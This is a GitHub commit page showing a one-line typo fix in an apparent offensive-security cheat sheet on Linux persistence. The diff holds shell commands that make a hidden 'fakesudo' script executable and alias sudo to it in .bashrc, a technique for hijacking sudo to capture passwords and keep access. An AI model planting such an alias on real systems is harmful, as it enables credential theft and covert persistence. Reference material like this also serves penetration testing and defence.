We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 2148c89 commit 1fcbd57Copy full SHA for 1fcbd57
Methodology and Resources/Linux - Persistence.md
@@ -72,7 +72,7 @@ or add the following line inside its .bashrc file.
72
73
```powershell
74
$ chmod u+x ~/.hidden/fakesudo
75
-$ echo "alias sudo=~/.hidden/fakesudo" >> ~./bashrc
+$ echo "alias sudo=~/.hidden/fakesudo" >> ~/.bashrc
76
```
77
78
and create the `fakesudo` script.
0 commit comments